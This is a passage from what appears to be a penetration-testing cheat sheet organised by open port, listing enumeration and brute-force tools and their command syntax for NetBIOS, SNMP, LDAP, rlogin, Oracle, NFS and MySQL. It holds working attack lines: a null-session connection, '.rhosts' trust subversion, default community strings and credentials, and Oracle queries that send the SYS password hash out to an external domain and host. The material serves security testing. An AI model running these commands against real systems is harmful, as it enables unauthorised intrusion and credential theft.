/rpFWUpload.html (Tools)
/DiagGeneral.html (Diagnostic)
/RemMagSNMP.html (SNMP Passwords)
/LAN_ClientList.html (Current DHCP Leases)
Config Backups
/RestoreCfg.html
/BackupCfg.html
Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
ZyXEL Config Reader
Examine web server logs
c:\winnt\system32\Logfiles\W3SVC1
awk -F " " '{print $3,$11} filename | sort | uniq
References
White Papers
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
Blind Security Testing - An Evolutionary Approach
Command Injection in XML Signatures and Encryption
Input Validation Cheat Sheet
SQL Injection Cheat Sheet
Books
Hacking Exposed Web 2.0
Hacking Exposed Web Applications
The Web Application Hacker's Handbook
Exploit Frameworks
Brute-force Tools
Acunetix
Metasploit
w3af
Portmapper port 111 open
rpcdump.py
rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
rpcinfo
rpcinfo [options] IP_Address
NTP Port 123 open
NTP Enumeration
ntpdc -c monlist IP_ADDRESS
ntpdc -c sysinfo IP_ADDRESS
ntpq
host
hostname
ntpversion
readlist
version
Examine configuration files
ntp.conf
NetBIOS Ports 135-139,445 open
NetBIOS enumeration
Enum
enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
Null Session
net use \\192.168.1.1\ipc$ "" /u:""
net view \\ip_address
Dumpsec
Smbclient
smbclient -L //server/share password options
Superscan
Enumeration tab.
user2sid/sid2user
Winfo
NetBIOS brute force
Hydra
Brutus
Cain & Abel
getacct
NAT (NetBIOS Auditing Tool)
Examine Configuration Files
Smb.conf
lmhosts
SNMP port 161 open
Default Community Strings
public
private
cisco
cable-docsis
ILMI
MIB enumeration
Windows NT
.1.3.6.1.2.1.1.5 Hostnames
.1.3.6.1.4.1.77.1.4.2 Domain Name
.1.3.6.1.4.1.77.1.2.25 Usernames
.1.3.6.1.4.1.77.1.2.3.1.1 Running Services
.1.3.6.1.4.1.77.1.2.27 Share Information
Solarwinds MIB walk
Getif
snmpwalk
snmpwalk -v <Version> -c <Community string> <IP>
Snscan
Applications
ZyXel
snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
SNMP Bruteforce
onesixtyone
onesixytone -c SNMP.wordlist <IP>
cat
./cat -h <IP> -w SNMP.wordlist
Solarwinds SNMP Brute Force
ADMsnmp
Examine SNMP Configuration files
snmp.conf
snmpd.conf
snmp-config.xml
LDAP Port 389 Open
ldap enumeration
ldapminer
ldapminer -h ip_address -p port (not required if default) -d
luma
Gui based tool
ldp
Gui based tool
openldap
ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
ldap brute force
bf_ldap
bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
K0ldS
LDAP_Brute.pl
Examine Configuration Files
General
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 server
V3.sas.oc
Microsoft Active Directory server
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP directory server
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif
PPTP/L2TP/VPN port 500/1723 open
Enumeration
ike-scan
ike-probe
Brute-Force
ike-crack
Reference Material
PSK cracking paper
SecurityFocus Infocus
Scanning a VPN Implementation
Modbus port 502 open
modscan
rlogin port 513 open
Rlogin Enumeration
Find the files
find / -name .rhosts
locate .rhosts
Examine Files
cat .rhosts
Manual Login
rlogin hostname -l username
rlogin <IP>
Subvert the files
echo ++ > .rhosts
Rlogin Brute force
Hydra
rsh port 514 open
Rsh Enumeration
rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
Rsh Brute Force
rsh-grind
Hydra
medusa
SQL Server Port 1433 1434 open
SQL Enumeration
piggy
SQLPing
sqlping ip_address/hostname
SQLPing2
SQLPing3
SQLpoke
SQL Recon
SQLver
SQL Brute Force
SQLPAT
sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
SQL Dict
SQLAT
Hydra
SQLlhf
ForceSQL
Citrix port 1494 open
Citrix Enumeration
Default Domain
Published Applications
./citrix-pa-scan {IP_address/file | - | random} [timeout]
citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
Citrix Brute Force
bforce.js
connect.js
Citrix Brute-forcer
Reference Material
Hacking Citrix - the legitimate backdoor
Hacking Citrix - the forceful way
Oracle Port 1521 Open
Oracle Enumeration
oracsec
Repscan
Sidguess
Scuba
DNS/HTTP Enumeration
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
WinSID
Oracle default password list
TNSVer
tnsver host [port]
TCP Scan
Oracle TNSLSNR
Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
TNSCmd
perl tnscmd.pl -h ip_address
perl tnscmd.pl version -h ip_address
perl tnscmd.pl status -h ip_address
perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
LSNrCheck
Oracle Security Check (needs credentials)
OAT
sh opwg.sh -s ip_address
opwg.bat -s ip_address
sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
OScanner
sh oscanner.sh -s ip_address
oscanner.exe -s ip_address
sh reportviewer.sh oscanner_saved_file.xml
reportviewer.exe oscanner_saved_file.xml
NGS Squirrel for Oracle
Service Register
Service-register.exe ip_address
PLSQL Scanner 2008
Oracle Brute Force
OAK
ora-getsid hostname port sid_dictionary_list
ora-auth-alter-session host port sid username password sql
ora-brutesid host port start
ora-pwdbrute host port sid username password-file
ora-userenum host port sid userlistfile
ora-ver -e (-f -l -a) host port
breakable (Targets Application Server Port)
breakable.exe host url [port] [v]
host - ip_address of the Oracle Portal Server
url - PATH_INFO i.e. /pls/orasso
port - TCP port Oracle Portal Server is serving pages from
v - verbose
SQLInjector (Targets Application Server Port)
sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
Check Password
orabf
orabf [hash]:[username] [options]
thc-orakel
Cracker
Client
Crypto
DBVisualisor
Sql scripts from pentest.co.uk
Manual SQL input of previously reported vulnerabilities
Oracle Reference Material
Understanding SQL Injection
SQL Injection walkthrough
SQL Injection by example
Advanced SQL Injection in Oracle databases
Blind SQL Injection
SQL Cheatsheets
http://ha.ckers.org/sqlinjection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://www.0x000000.com/?i=14
http://pentestmonkey.net/
NFS Port 2049 open
NFS Enumeration
showmount -e hostname/ip_address
mount -t nfs ip_address:/directory_found_exported /local_mount_point
NFS Brute Force
Interact with NFS share and try to add/delete
Exploit and Confuse Unix
Examine Configuration Files
/etc/exports
/etc/lib/nfs/xtab
Compaq/HP Insight Manager Port 2301, 2381 open
HP Enumeration
Authentication Method
Host OS Authentication
Default Authentication
Default Passwords
Wikto
Nstealth
HP Bruteforce
Hydra
Acunetix
Examine Configuration Files
path.properties
mx.log
CLIClientConfig.cfg
database.props
pg_hba.conf
jboss-service.xml
.namazurc
MySQL port 3306 open
Enumeration
nmap -A -n -p3306 <IP Address>
nmap -A -n -PN --script:ALL -p3306 <IP Address>
telnet IP_Address 3306
use test; select * from test;
To check for other DB's -- show databases
Administration
MySQL Network Scanner
MySQL GUI Tools
mysqlshow
mysqlbinlog
Manual Checks
Default usernames and passwords
username: root password:
testing
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
mysql -h <Hostname>
mysql -h <Hostname> -u ""@localhost
Configuration Files
Operating System
windows
config.ini
my.ini
windows\my.ini
winnt\my.ini
<InstDir>/mysql/data/
unix
my.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
/etc/my.cnf
Command History
~/.mysql.history
Log Files
connections.log
update.log
common.log
To run many sql commands at once -- mysql -u username -p < manycommands.sql
MySQL data directory (Location specified in my.cnf)
Parent dir = data directory
mysql
test
information_schema (Key information in MySQL)
Complete table list -- select table_schema,table_name from tables;
Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
File privileges -- select user,file_priv from mysql.user where user='root';
Version -- select version();
Load a specific file -- SELECT LOAD_FILE('FILENAME');
SSL Check
mysql> show variables like 'have_openssl';
If no rows are returned at all, it means the distro itself doesn't support SSL connections and probably needs to be recompiled. If it's disabled, it means the service just wasn't started with SSL and can be easily fixed.
Privilege Escalation
Current Level of access
mysql>select user();